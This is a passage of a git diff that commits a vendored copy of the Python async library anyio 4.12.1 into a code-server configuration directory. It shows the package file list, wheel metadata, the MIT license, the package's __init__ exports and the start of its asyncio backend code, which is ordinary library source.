+anyio-4.12.1.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4 +anyio-4.12.1.dist-info/METADATA,sha256=DfiDab9Tmmcfy802lOLTMEHJQShkOSbopCwqCYbLuJk,4277 +anyio-4.12.1.dist-info/RECORD,, +anyio-4.12.1.dist-info/WHEEL,sha256=_zCd3N1l69ArxyTb8rzEoP9TpbYXkqRFSNOD5OuxnTs,91 +anyio-4.12.1.dist-info/entry_points.txt,sha256=_d6Yu6uiaZmNe0CydowirE9Cmg7zUL2g08tQpoS3Qvc,39 +anyio-4.12.1.dist-info/licenses/LICENSE,sha256=U2GsncWPLvX9LpsJxoKXwX8ElQkJu8gCO9uC6s8iwrA,1081 +anyio-4.12.1.dist-info/top_level.txt,sha256=QglSMiWX8_5dpoVAEIHdEYzvqFMdSYWmCj6tYw2ITkQ,6 +anyio/__init__.py,sha256=7iDVqMUprUuKNY91FuoKqayAhR-OY136YDPI6P78HHk,6170 +anyio/__pycache__/__init__.cpython-312.pyc,, +anyio/__pycache__/from_thread.cpython-312.pyc,, +anyio/__pycache__/functools.cpython-312.pyc,, +anyio/__pycache__/lowlevel.cpython-312.pyc,, +anyio/__pycache__/pytest_plugin.cpython-312.pyc,, +anyio/__pycache__/to_interpreter.cpython-312.pyc,, +anyio/__pycache__/to_process.cpython-312.pyc,, +anyio/__pycache__/to_thread.cpython-312.pyc,, +anyio/_backends/__init__.py,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0 +anyio/_backends/__pycache__/__init__.cpython-312.pyc,, +anyio/_backends/__pycache__/_asyncio.cpython-312.pyc,, +anyio/_backends/__pycache__/_trio.cpython-312.pyc,, +anyio/_backends/_asyncio.py,sha256=xG6qv60mgGnL0mK82dxjH2b8hlkMlJ-x2BqIq3qv70Y,98863 +anyio/_backends/_trio.py,sha256=30Rctb7lm8g63ZHljVPVnj5aH-uK6oQvphjwUBoAzuI,41456 +anyio/_core/__init__.py,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0 +anyio/_core/__pycache__/__init__.cpython-312.pyc,, +anyio/_core/__pycache__/_asyncio_selector_thread.cpython-312.pyc,, +anyio/_core/__pycache__/_contextmanagers.cpython-312.pyc,, +anyio/_core/__pycache__/_eventloop.cpython-312.pyc,, +anyio/_core/__pycache__/_exceptions.cpython-312.pyc,, +anyio/_core/__pycache__/_fileio.cpython-312.pyc,, +anyio/_core/__pycache__/_resources.cpython-312.pyc,, +anyio/_core/__pycache__/_signals.cpython-312.pyc,, +anyio/_core/__pycache__/_sockets.cpython-312.pyc,, +anyio/_core/__pycache__/_streams.cpython-312.pyc,, +anyio/_core/__pycache__/_subprocesses.cpython-312.pyc,, +anyio/_core/__pycache__/_synchronization.cpython-312.pyc,, +anyio/_core/__pycache__/_tasks.cpython-312.pyc,, +anyio/_core/__pycache__/_tempfile.cpython-312.pyc,, +anyio/_core/__pycache__/_testing.cpython-312.pyc,, +anyio/_core/__pycache__/_typedattr.cpython-312.pyc,, +anyio/_core/_asyncio_selector_thread.py,sha256=2PdxFM3cs02Kp6BSppbvmRT7q7asreTW5FgBxEsflBo,5626 +anyio/_core/_contextmanagers.py,sha256=YInBCabiEeS-UaP_Jdxa1CaFC71ETPW8HZTHIM8Rsc8,7215 +anyio/_core/_eventloop.py,sha256=c2EdcBX-xnKwxPcC4Pjn3_qG9I-x4IWFO2R9RqCGjM4,6448 +anyio/_core/_exceptions.py,sha256=Y3aq-Wxd7Q2HqwSg7nZPvRsHEuGazv_qeet6gqEBdPk,4407 +anyio/_core/_fileio.py,sha256=uc7t10Vb-If7GbdWM_zFf-ajUe6uek63fSt7IBLlZW0,25731 +anyio/_core/_resources.py,sha256=NbmU5O5UX3xEyACnkmYX28Fmwdl-f-ny0tHym26e0w0,435 +anyio/_core/_signals.py,sha256=mjTBB2hTKNPRlU0IhnijeQedpWOGERDiMjSlJQsFrug,1016 +anyio/_core/_sockets.py,sha256=RBXHcUqZt5gg_-OOfgHVv8uq2FSKk1uVUzTdpjBoI1o,34977 +anyio/_core/_streams.py,sha256=FczFwIgDpnkK0bODWJXMpsUJYdvAD04kaUaGzJU8DK0,1806 +anyio/_core/_subprocesses.py,sha256=EXm5igL7dj55iYkPlbYVAqtbqxJxjU-6OndSTIx9SRg,8047 +anyio/_core/_synchronization.py,sha256=MgVVqFzvt580tHC31LiOcq1G6aryut--xRG4Ff8KwxQ,20869 +anyio/_core/_tasks.py,sha256=pVB7K6AAulzUM8YgXAeqNZG44nSyZ1bYJjH8GznC00I,5435 +anyio/_core/_tempfile.py,sha256=lHb7CW4FyIlpkf5ADAf4VmLHCKwEHF9nxqNyBCFFUiA,19697 +anyio/_core/_testing.py,sha256=u7MPqGXwpTxqI7hclSdNA30z2GH1Nw258uwKvy_RfBg,2340 +anyio/_core/_typedattr.py,sha256=P4ozZikn3-DbpoYcvyghS_FOYAgbmUxeoU8-L_07pZM,2508 +anyio/abc/__init__.py,sha256=6mWhcl_pGXhrgZVHP_TCfMvIXIOp9mroEFM90fYCU_U,2869 +anyio/abc/__pycache__/__init__.cpython-312.pyc,, +anyio/abc/__pycache__/_eventloop.cpython-312.pyc,, +anyio/abc/__pycache__/_resources.cpython-312.pyc,, +anyio/abc/__pycache__/_sockets.cpython-312.pyc,, +anyio/abc/__pycache__/_streams.cpython-312.pyc,, +anyio/abc/__pycache__/_subprocesses.cpython-312.pyc,, +anyio/abc/__pycache__/_tasks.cpython-312.pyc,, +anyio/abc/__pycache__/_testing.cpython-312.pyc,, +anyio/abc/_eventloop.py,sha256=GlzgB3UJGgG6Kr7olpjOZ-o00PghecXuofVDQ_5611Q,10749 +anyio/abc/_resources.py,sha256=DrYvkNN1hH6Uvv5_5uKySvDsnknGVDe8FCKfko0VtN8,783 +anyio/abc/_sockets.py,sha256=ECTY0jLEF18gryANHR3vFzXzGdZ-xPwELq1QdgOb0Jo,13258 +anyio/abc/_streams.py,sha256=005GKSCXGprxnhucILboSqc2JFovECZk9m3p-qqxXVc,7640 +anyio/abc/_subprocesses.py,sha256=cumAPJTktOQtw63IqG0lDpyZqu_l1EElvQHMiwJgL08,2067 +anyio/abc/_tasks.py,sha256=KC7wrciE48AINOI-AhPutnFhe1ewfP7QnamFlDzqesQ,3721 +anyio/abc/_testing.py,sha256=tBJUzkSfOXJw23fe8qSJ03kJlShOYjjaEyFB6k6MYT8,1821 +anyio/from_thread.py,sha256=L-0w1HxJ6BSb-KuVi57k5Tkc3yzQrx3QK5tAxMPcY-0,19141 +anyio/functools.py,sha256=HWj7GBEmc0Z-mZg3uok7Z7ZJn0rEC_0Pzbt0nYUDaTQ,10973 +anyio/lowlevel.py,sha256=AyKLVK3LaWSoK39LkCKxE4_GDMLKZBNqTrLUgk63y80,5158 +anyio/py.typed,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0 +anyio/pytest_plugin.py,sha256=3jAFQn0jv_pyoWE2GBBlHaj9sqXj4e8vob0_hgrsXE8,10244 +anyio/streams/__init__.py,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0 +anyio/streams/__pycache__/__init__.cpython-312.pyc,, +anyio/streams/__pycache__/buffered.cpython-312.pyc,, +anyio/streams/__pycache__/file.cpython-312.pyc,, +anyio/streams/__pycache__/memory.cpython-312.pyc,, +anyio/streams/__pycache__/stapled.cpython-312.pyc,, +anyio/streams/__pycache__/text.cpython-312.pyc,, +anyio/streams/__pycache__/tls.cpython-312.pyc,, +anyio/streams/buffered.py,sha256=2R3PeJhe4EXrdYqz44Y6-Eg9R6DrmlsYrP36Ir43-po,6263 +anyio/streams/file.py,sha256=4WZ7XGz5WNu39FQHvqbe__TQ0HDP9OOhgO1mk9iVpVU,4470 +anyio/streams/memory.py,sha256=F0zwzvFJKAhX_LRZGoKzzqDC2oMM-f-yyTBrEYEGOaU,10740 +anyio/streams/stapled.py,sha256=T8Xqwf8K6EgURPxbt1N4i7A8BAk-gScv-GRhjLXIf_o,4390 +anyio/streams/text.py,sha256=BcVAGJw1VRvtIqnv-o0Rb0pwH7p8vwlvl21xHq522ag,5765 +anyio/streams/tls.py,sha256=Jpxy0Mfbcp1BxHCwE-YjSSFaLnIBbnnwur-excYThs4,15368 +anyio/to_interpreter.py,sha256=_mLngrMy97TMR6VbW4Y6YzDUk9ZuPcQMPlkuyRh3C9k,7100 +anyio/to_process.py,sha256=J7gAA_YOuoHqnpDAf5fm1Qu6kOmTzdFbiDNvnV755vk,9798 +anyio/to_thread.py,sha256=menEgXYmUV7Fjg_9WqCV95P9MAtQS8BzPGGcWB_QnfQ,2687 diff --git a/code-server-config/.local/lib/python3.12/site-packages/anyio-4.12.1.dist-info/WHEEL b/code-server-config/.local/lib/python3.12/site-packages/anyio-4.12.1.dist-info/WHEEL new file mode 100755 index 0000000..e7fa31b --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/anyio-4.12.1.dist-info/WHEEL @@ -0,0 +1,5 @@ +Wheel-Version: 1.0 +Generator: setuptools (80.9.0) +Root-Is-Purelib: true +Tag: py3-none-any + diff --git a/code-server-config/.local/lib/python3.12/site-packages/anyio-4.12.1.dist-info/entry_points.txt b/code-server-config/.local/lib/python3.12/site-packages/anyio-4.12.1.dist-info/entry_points.txt new file mode 100755 index 0000000..44dd9bd --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/anyio-4.12.1.dist-info/entry_points.txt @@ -0,0 +1,2 @@ +[pytest11] +anyio = anyio.pytest_plugin diff --git a/code-server-config/.local/lib/python3.12/site-packages/anyio-4.12.1.dist-info/licenses/LICENSE b/code-server-config/.local/lib/python3.12/site-packages/anyio-4.12.1.dist-info/licenses/LICENSE new file mode 100755 index 0000000..104eebf --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/anyio-4.12.1.dist-info/licenses/LICENSE @@ -0,0 +1,20 @@ +The MIT License (MIT) + +Copyright (c) 2018 Alex Grönholm + +Permission is hereby granted, free of charge, to any person obtaining a copy of +this software and associated documentation files (the "Software"), to deal in +the Software without restriction, including without limitation the rights to +use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of +the Software, and to permit persons to whom the Software is furnished to do so, +subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS +FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR +COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER +IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN +CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. diff --git a/code-server-config/.local/lib/python3.12/site-packages/anyio-4.12.1.dist-info/top_level.txt b/code-server-config/.local/lib/python3.12/site-packages/anyio-4.12.1.dist-info/top_level.txt new file mode 100755 index 0000000..c77c069 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/anyio-4.12.1.dist-info/top_level.txt @@ -0,0 +1 @@ +anyio diff --git a/code-server-config/.local/lib/python3.12/site-packages/anyio/__init__.py b/code-server-config/.local/lib/python3.12/site-packages/anyio/__init__.py new file mode 100755 index 0000000..d23c5a5 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/anyio/__init__.py @@ -0,0 +1,111 @@ +from __future__ import annotations + +from ._core._contextmanagers import AsyncContextManagerMixin as AsyncContextManagerMixin +from ._core._contextmanagers import ContextManagerMixin as ContextManagerMixin +from ._core._eventloop import current_time as current_time +from ._core._eventloop import get_all_backends as get_all_backends +from ._core._eventloop import get_available_backends as get_available_backends +from ._core._eventloop import get_cancelled_exc_class as get_cancelled_exc_class +from ._core._eventloop import run as run +from ._core._eventloop import sleep as sleep +from ._core._eventloop import sleep_forever as sleep_forever +from ._core._eventloop import sleep_until as sleep_until +from ._core._exceptions import BrokenResourceError as BrokenResourceError +from ._core._exceptions import BrokenWorkerInterpreter as BrokenWorkerInterpreter +from ._core._exceptions import BrokenWorkerProcess as BrokenWorkerProcess +from ._core._exceptions import BusyResourceError as BusyResourceError +from ._core._exceptions import ClosedResourceError as ClosedResourceError +from ._core._exceptions import ConnectionFailed as ConnectionFailed +from ._core._exceptions import DelimiterNotFound as DelimiterNotFound +from ._core._exceptions import EndOfStream as EndOfStream +from ._core._exceptions import IncompleteRead as IncompleteRead +from ._core._exceptions import NoEventLoopError as NoEventLoopError +from ._core._exceptions import RunFinishedError as RunFinishedError +from ._core._exceptions import TypedAttributeLookupError as TypedAttributeLookupError +from ._core._exceptions import WouldBlock as WouldBlock +from ._core._fileio import AsyncFile as AsyncFile +from ._core._fileio import Path as Path +from ._core._fileio import open_file as open_file +from ._core._fileio import wrap_file as wrap_file +from ._core._resources import aclose_forcefully as aclose_forcefully +from ._core._signals import open_signal_receiver as open_signal_receiver +from ._core._sockets import TCPConnectable as TCPConnectable +from ._core._sockets import UNIXConnectable as UNIXConnectable +from ._core._sockets import as_connectable as as_connectable +from ._core._sockets import connect_tcp as connect_tcp +from ._core._sockets import connect_unix as connect_unix +from ._core._sockets import create_connected_udp_socket as create_connected_udp_socket +from ._core._sockets import ( + create_connected_unix_datagram_socket as create_connected_unix_datagram_socket, +) +from ._core._sockets import create_tcp_listener as create_tcp_listener +from ._core._sockets import create_udp_socket as create_udp_socket +from ._core._sockets import create_unix_datagram_socket as create_unix_datagram_socket +from ._core._sockets import create_unix_listener as create_unix_listener +from ._core._sockets import getaddrinfo as getaddrinfo +from ._core._sockets import getnameinfo as getnameinfo +from ._core._sockets import notify_closing as notify_closing +from ._core._sockets import wait_readable as wait_readable +from ._core._sockets import wait_socket_readable as wait_socket_readable +from ._core._sockets import wait_socket_writable as wait_socket_writable +from ._core._sockets import wait_writable as wait_writable +from ._core._streams import create_memory_object_stream as create_memory_object_stream +from ._core._subprocesses import open_process as open_process +from ._core._subprocesses import run_process as run_process +from ._core._synchronization import CapacityLimiter as CapacityLimiter +from ._core._synchronization import ( + CapacityLimiterStatistics as CapacityLimiterStatistics, +) +from ._core._synchronization import Condition as Condition +from ._core._synchronization import ConditionStatistics as ConditionStatistics +from ._core._synchronization import Event as Event +from ._core._synchronization import EventStatistics as EventStatistics +from ._core._synchronization import Lock as Lock +from ._core._synchronization import LockStatistics as LockStatistics +from ._core._synchronization import ResourceGuard as ResourceGuard +from ._core._synchronization import Semaphore as Semaphore +from ._core._synchronization import SemaphoreStatistics as SemaphoreStatistics +from ._core._tasks import TASK_STATUS_IGNORED as TASK_STATUS_IGNORED +from ._core._tasks import CancelScope as CancelScope +from ._core._tasks import create_task_group as create_task_group +from ._core._tasks import current_effective_deadline as current_effective_deadline +from ._core._tasks import fail_after as fail_after +from ._core._tasks import move_on_after as move_on_after +from ._core._tempfile import NamedTemporaryFile as NamedTemporaryFile +from ._core._tempfile import SpooledTemporaryFile as SpooledTemporaryFile +from ._core._tempfile import TemporaryDirectory as TemporaryDirectory +from ._core._tempfile import TemporaryFile as TemporaryFile +from ._core._tempfile import gettempdir as gettempdir +from ._core._tempfile import gettempdirb as gettempdirb +from ._core._tempfile import mkdtemp as mkdtemp +from ._core._tempfile import mkstemp as mkstemp +from ._core._testing import TaskInfo as TaskInfo +from ._core._testing import get_current_task as get_current_task +from ._core._testing import get_running_tasks as get_running_tasks +from ._core._testing import wait_all_tasks_blocked as wait_all_tasks_blocked +from ._core._typedattr import TypedAttributeProvider as TypedAttributeProvider +from ._core._typedattr import TypedAttributeSet as TypedAttributeSet +from ._core._typedattr import typed_attribute as typed_attribute + +# Re-export imports so they look like they live directly in this package +for __value in list(locals().values()): + if getattr(__value, "__module__", "").startswith("anyio."): + __value.__module__ = __name__ + + +del __value + + +def __getattr__(attr: str) -> type[BrokenWorkerInterpreter]: + """Support deprecated aliases.""" + if attr == "BrokenWorkerIntepreter": + import warnings + + warnings.warn( + "The 'BrokenWorkerIntepreter' alias is deprecated, use 'BrokenWorkerInterpreter' instead.", + DeprecationWarning, + stacklevel=2, + ) + return BrokenWorkerInterpreter + + raise AttributeError(f"module {__name__!r} has no attribute {attr!r}") diff --git a/code-server-config/.local/lib/python3.12/site-packages/anyio/_backends/__init__.py b/code-server-config/.local/lib/python3.12/site-packages/anyio/_backends/__init__.py new file mode 100755 index 0000000..e69de29 diff --git a/code-server-config/.local/lib/python3.12/site-packages/anyio/_backends/_asyncio.py b/code-server-config/.local/lib/python3.12/site-packages/anyio/_backends/_asyncio.py new file mode 100755 index 0000000..8ff009e --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/anyio/_backends/_asyncio.py @@ -0,0 +1,2980 @@ +from __future__ import annotations + +import array +import asyncio +import concurrent.futures +import contextvars +import math +import os +import socket +import sys +import threading +import weakref +from asyncio import ( + AbstractEventLoop, + CancelledError, + all_tasks, + create_task, + current_task, + get_running_loop, + sleep, +) +from asyncio.base_events import _run_until_complete_cb # type: ignore[attr-defined] +from collections import OrderedDict, deque +from collections.abc import ( + AsyncGenerator, + AsyncIterator, + Awaitable, + Callable, + Collection, + Coroutine, + Iterable, + Sequence, +) +from concurrent.futures import Future +from contextlib import AbstractContextManager, suppress +from contextvars import Context, copy_context +from dataclasses import dataclass, field +from functools import partial, wraps +from inspect import ( + CORO_RUNNING, + CORO_SUSPENDED, + getcoroutinestate, + iscoroutine, +) +from io import IOBase +from os import PathLike +from queue import Queue +from signal import Signals +from socket import AddressFamily, SocketKind +from threading import Thread +from types import CodeType, TracebackType +from typing import ( + IO, + TYPE_CHECKING, + Any, + Optional, + TypeVar, + cast, +) +from weakref import WeakKeyDictionary + +from .. import ( + CapacityLimiterStatistics, + EventStatistics, + LockStatistics, + TaskInfo, + abc, +) +from .._core._eventloop import ( + claim_worker_thread, + set_current_async_library, + threadlocals, +) +from .._core._exceptions import ( + BrokenResourceError, + BusyResourceError, + ClosedResourceError, + EndOfStream, + RunFinishedError, + WouldBlock, + iterate_exceptions, +) +from .._core._sockets import convert_ipv6_sockaddr +from .._core._streams import create_memory_object_stream +from .._core._synchronization import ( + CapacityLimiter as BaseCapacityLimiter, +) +from .._core._synchronization import Event as BaseEvent +from .._core._synchronization import Lock as BaseLock +from .._core._synchronization import ( + ResourceGuard, + SemaphoreStatistics, +) +from .._core._synchronization import Semaphore as BaseSemaphore +from .._core._tasks import CancelScope as BaseCancelScope +from ..abc import ( + AsyncBackend, + IPSockAddrType, + SocketListener, + UDPPacketType, + UNIXDatagramPacketType, +) +from ..abc._eventloop import StrOrBytesPath +from ..lowlevel import RunVar +from ..streams.memory import MemoryObjectReceiveStream, MemoryObjectSendStream + +if TYPE_CHECKING: + from _typeshed import FileDescriptorLike +else: + FileDescriptorLike = object + +if sys.version_info >= (3, 10): + from typing import ParamSpec +else: + from typing_extensions import ParamSpec + +if sys.version_info >= (3, 11): + from asyncio import Runner + from typing import TypeVarTuple, Unpack +else: + import contextvars + import enum + import signal + from asyncio import coroutines, events, exceptions, tasks + + from exceptiongroup import BaseExceptionGroup + from typing_extensions import TypeVarTuple, Unpack + + class _State(enum.Enum): + CREATED = "created" + INITIALIZED = "initialized" + CLOSED = "closed" + + class Runner: + # Copied from CPython 3.11 + def __init__( + self, + *, + debug: bool | None = None, + loop_factory: Callable[[], AbstractEventLoop] | None = None, + ): + self._state = _State.CREATED + self._debug = debug + self._loop_factory = loop_factory + self._loop: AbstractEventLoop | None = None + self._context = None + self._interrupt_count = 0 + self._set_event_loop = False + + def __enter__(self) -> Runner: + self._lazy_init() + return self + + def __exit__( + self, + exc_type: type[BaseException] | None, + exc_val: BaseException | None, + exc_tb: TracebackType | None, + ) -> None: + self.close() + + def close(self) -> None: + """Shutdown and close event loop.""" + loop = self._loop + if self._state is not _State.INITIALIZED or loop is None: + return + try: + _cancel_all_tasks(loop) + loop.run_until_complete(loop.shutdown_asyncgens()) + if hasattr(loop, "shutdown_default_executor"): + loop.run_until_complete(loop.shutdown_default_executor()) + else: + loop.run_until_complete(_shutdown_default_executor(loop)) + finally: + if self._set_event_loop: + events.set_event_loop(None) + loop.close() + self._loop = None + self._state = _State.CLOSED + + def get_loop(self) -> AbstractEventLoop: + """Return embedded event loop.""" + self._lazy_init() + return self._loop + + def run(self, coro: Coroutine[T_Retval], *, context=None) -> T_Retval: + """Run a coroutine inside the embedded event loop.""" + if not coroutines.iscoroutine(coro): + raise ValueError(f"a coroutine was expected, got {coro!r}") + + if events._get_running_loop() is not None: + # fail fast with short traceback + raise RuntimeError( + "Runner.run() cannot be called from a running event loop" + ) + + self._lazy_init() + + if context is None: + context = self._context + task = context.run(self._loop.create_task, coro) + + if ( + threading.current_thread() is threading.main_thread() + and signal.getsignal(signal.SIGINT) is signal.default_int_handler + ): + sigint_handler = partial(self._on_sigint, main_task=task) + try: + signal.signal(signal.SIGINT, sigint_handler) + except ValueError: + # `signal.signal` may throw if `threading.main_thread` does + # not support signals (e.g. embedded interpreter with signals + # not registered - see gh-91880) + sigint_handler = None + else: + sigint_handler = None + + self._interrupt_count = 0 + try: + return self._loop.run_until_complete(task) + except exceptions.CancelledError: + if self._interrupt_count > 0: + uncancel = getattr(task, "uncancel", None) + if uncancel is not None and uncancel() == 0: + raise KeyboardInterrupt # noqa: B904 + raise # CancelledError + finally: + if ( + sigint_handler is not None + and signal.getsignal(signal.SIGINT) is sigint_handler + ): + signal.signal(signal.SIGINT, signal.default_int_handler) + + def _lazy_init(self) -> None: + if self._state is _State.CLOSED: + raise RuntimeError("Runner is closed") + if self._state is _State.INITIALIZED: + return + if self._loop_factory is None: + self._loop = events.new_event_loop() + if not self._set_event_loop: + # Call set_event_loop only once to avoid calling + # attach_loop multiple times on child watchers + events.set_event_loop(self._loop) + self._set_event_loop = True + else: + self._loop = self._loop_factory() + if self._debug is not None: + self._loop.set_debug(self._debug) + self._context = contextvars.copy_context() + self._state = _State.INITIALIZED + + def _on_sigint(self, signum, frame, main_task: asyncio.Task) -> None: + self._interrupt_count += 1 + if self._interrupt_count == 1 and not main_task.done(): + main_task.cancel() + # wakeup loop if it is blocked by select() with long timeout + self._loop.call_soon_threadsafe(lambda: None) + return + raise KeyboardInterrupt() + + def _cancel_all_tasks(loop: AbstractEventLoop) -> None: + to_cancel = tasks.all_tasks(loop) + if not to_cancel: + return + + for task in to_cancel: + task.cancel() + + loop.run_until_complete(tasks.gather(*to_cancel, return_exceptions=True)) + + for task in to_cancel: + if task.cancelled(): + continue + if task.exception() is not None: + loop.call_exception_handler( + { + "message": "unhandled exception during asyncio.run() shutdown", + "exception": task.exception(), + "task": task, + } + ) + + async def _shutdown_default_executor(loop: AbstractEventLoop) -> None: + """Schedule the shutdown of the default executor.""" + + def _do_shutdown(future: asyncio.futures.Future) -> None: + try: + loop._default_executor.shutdown(wait=True) # type: ignore[attr-defined] + loop.call_soon_threadsafe(future.set_result, None) + except Exception as ex: + loop.call_soon_threadsafe(future.set_exception, ex) + + loop._executor_shutdown_called = True + if loop._default_executor is None: + return + future = loop.create_future() + thread = threading.Thread(target=_do_shutdown, args=(future,)) + thread.start() + try: + await future + finally: + thread.join() + + +T_Retval = TypeVar("T_Retval") +T_contra = TypeVar("T_contra", contravariant=True) +PosArgsT = TypeVarTuple("PosArgsT") +P = ParamSpec("P") + +_root_task: RunVar[asyncio.Task | None] = RunVar("_root_task") + + +def find_root_task() -> asyncio.Task: + root_task = _root_task.get(None) + if root_task is not None and not root_task.done(): + return root_task + + # Look for a task that has been started via run_until_complete() + for task in all_tasks(): + if task._callbacks and not task.done(): + callbacks = [cb for cb, context in task._callbacks] + for cb in callbacks: + if ( + cb is _run_until_complete_cb + or getattr(cb, "__module__", None) == "uvloop.loop" + ): + _root_task.set(task) + return task + + # Look up the topmost task in the AnyIO task tree, if possible + task = cast(asyncio.Task, current_task()) + state = _task_states.get(task) + if state: + cancel_scope = state.cancel_scope + while cancel_scope and cancel_scope._parent_scope is not None: + cancel_scope = cancel_scope._parent_scope + + if cancel_scope is not None: + return cast(asyncio.Task, cancel_scope._host_task) + + return task + + +def get_callable_name(func: Callable) -> str: + module = getattr(func, "__module__", None) + qualname = getattr(func, "__qualname__", None) + return ".".join([x for x in (module, qualname) if x]) + + +# +# Event loop +# + +_run_vars: WeakKeyDictionary[asyncio.AbstractEventLoop, Any] = WeakKeyDictionary() + + +def _task_started(task: asyncio.Task) -> bool: + """Return ``True`` if the task has been started and has not finished.""" + # The task coro should never be None here, as we never add finished tasks to the + # task list + coro = task.get_coro() + assert coro is not None + try: + return getcoroutinestate(coro) in (CORO_RUNNING, CORO_SUSPENDED) + except AttributeError: + # task coro is async_genenerator_asend https://bugs.python.org/issue37771 + raise Exception(f"Cannot determine if task {task} has started or not") from None + + +# +# Timeouts and cancellation +# + + +def is_anyio_cancellation(exc: CancelledError) -> bool: + # Sometimes third party frameworks catch a CancelledError and raise a new one, so as + # a workaround we have to look at the previous ones in __context__ too for a + # matching cancel message + while True: + if ( + exc.args + and isinstance(exc.args[0], str) + and exc.args[0].startswith("Cancelled via cancel scope ") + ): + return True + + if isinstance(exc.__context__, CancelledError): + exc = exc.__context__ + continue + + return False + + +class CancelScope(BaseCancelScope): + def __new__( + cls, *, deadline: float = math.inf, shield: bool = False + ) -> CancelScope: + return object.__new__(cls) + + def __init__(self, deadline: float = math.inf, shield: bool = False): + self._deadline = deadline + self._shield = shield + self._parent_scope: CancelScope | None = None + self._child_scopes: set[CancelScope] = set() + self._cancel_called = False + self._cancel_reason: str | None = None + self._cancelled_caught = False + self._active = False + self._timeout_handle: asyncio.TimerHandle | None = None + self._cancel_handle: asyncio.Handle | None = None + self._tasks: set[asyncio.Task] = set() + self._host_task: asyncio.Task | None = None + if sys.version_info >= (3, 11): + self._pending_uncancellations: int | None = 0 + else: + self._pending_uncancellations = None + + def __enter__(self) -> CancelScope: + if self._active: + raise RuntimeError( + "Each CancelScope may only be used for a single 'with' block" + ) + + self._host_task = host_task = cast(asyncio.Task, current_task()) + self._tasks.add(host_task) + try: + task_state = _task_states[host_task] + except KeyError: + task_state = TaskState(None, self) + _task_states[host_task] = task_state + else: + self._parent_scope = task_state.cancel_scope + task_state.cancel_scope = self + if self._parent_scope is not None: + # If using an eager task factory, the parent scope may not even contain + # the host task + self._parent_scope._child_scopes.add(self) + self._parent_scope._tasks.discard(host_task) + + self._timeout() + self._active = True + + # Start cancelling the host task if the scope was cancelled before entering + if self._cancel_called: + self._deliver_cancellation(self) + + return self + + def __exit__( + self, + exc_type: type[BaseException] | None, + exc_val: BaseException | None, + exc_tb: TracebackType | None, + ) -> bool: + del exc_tb + + if not self._active: + raise RuntimeError("This cancel scope is not active") + if current_task() is not self._host_task: + raise RuntimeError( + "Attempted to exit cancel scope in a different task than it was " + "entered in" + ) + + assert self._host_task is not None + host_task_state = _task_states.get(self._host_task) + if host_task_state is None or host_task_state.cancel_scope is not self: + raise RuntimeError( + "Attempted to exit a cancel scope that isn't the current tasks's " + "current cancel scope" + ) + + try: + self._active = False + if self._timeout_handle: + self._timeout_handle.cancel() + self._timeout_handle = None + + self._tasks.remove(self._host_task) + if self._parent_scope is not None: + self._parent_scope._child_scopes.remove(self) + self._parent_scope._tasks.add(self._host_task) + + host_task_state.cancel_scope = self._parent_scope + + # Restart the cancellation effort in the closest visible, cancelled parent + # scope if necessary + self._restart_cancellation_in_parent() + + # We only swallow the exception iff it was an AnyIO CancelledError, either + # directly as exc_val or inside an exception group and there are no cancelled + # parent cancel scopes visible to us here + if self._cancel_called and not self._parent_cancellation_is_visible_to_us: + # For each level-cancel() call made on the host task, call uncancel() + while self._pending_uncancellations: + self._host_task.uncancel() + self._pending_uncancellations -= 1 + + # Update cancelled_caught and check for exceptions we must not swallow + cannot_swallow_exc_val = False + if exc_val is not None: + for exc in iterate_exceptions(exc_val): + if isinstance(exc, CancelledError) and is_anyio_cancellation( + exc + ): + self._cancelled_caught = True + else: + cannot_swallow_exc_val = True + + return self._cancelled_caught and not cannot_swallow_exc_val + else: + if self._pending_uncancellations: + assert self._parent_scope is not None + assert self._parent_scope._pending_uncancellations is not None + self._parent_scope._pending_uncancellations += ( + self._pending_uncancellations + ) + self._pending_uncancellations = 0 + + return False + finally: + self._host_task = None + del exc_val + + @property + def _effectively_cancelled(self) -> bool: + cancel_scope: CancelScope | None = self + while cancel_scope is not None: + if cancel_scope._cancel_called: + return True + + if cancel_scope.shield: + return False + + cancel_scope = cancel_scope._parent_scope + + return False + + @property + def _parent_cancellation_is_visible_to_us(self) -> bool: + return ( + self._parent_scope is not None + and not self.shield + and self._parent_scope._effectively_cancelled + ) + + def _timeout(self) -> None: + if self._deadline != math.inf: + loop = get_running_loop() + if loop.time() >= self._deadline: + self.cancel("deadline exceeded") + else: + self._timeout_handle = loop.call_at(self._deadline, self._timeout) + + def _deliver_cancellation(self, origin: CancelScope) -> bool: + """ + Deliver cancellation to directly contained tasks and nested cancel scopes. + + Schedule another run at the end if we still have tasks eligible for + cancellation. + + :param origin: the cancel scope that originated the cancellation + :return: ``True`` if the delivery needs to be retried on the next cycle + + """ + should_retry = False + current = current_task() + for task in self._tasks: + should_retry = True + if task._must_cancel: # type: ignore[attr-defined] + continue + + # The task is eligible for cancellation if it has started + if task is not current and (task is self._host_task or _task_started(task)): + waiter = task._fut_waiter # type: ignore[attr-defined] + if not isinstance(waiter, asyncio.Future) or not waiter.done(): + task.cancel(origin._cancel_reason) + if ( + task is origin._host_task + and origin._pending_uncancellations 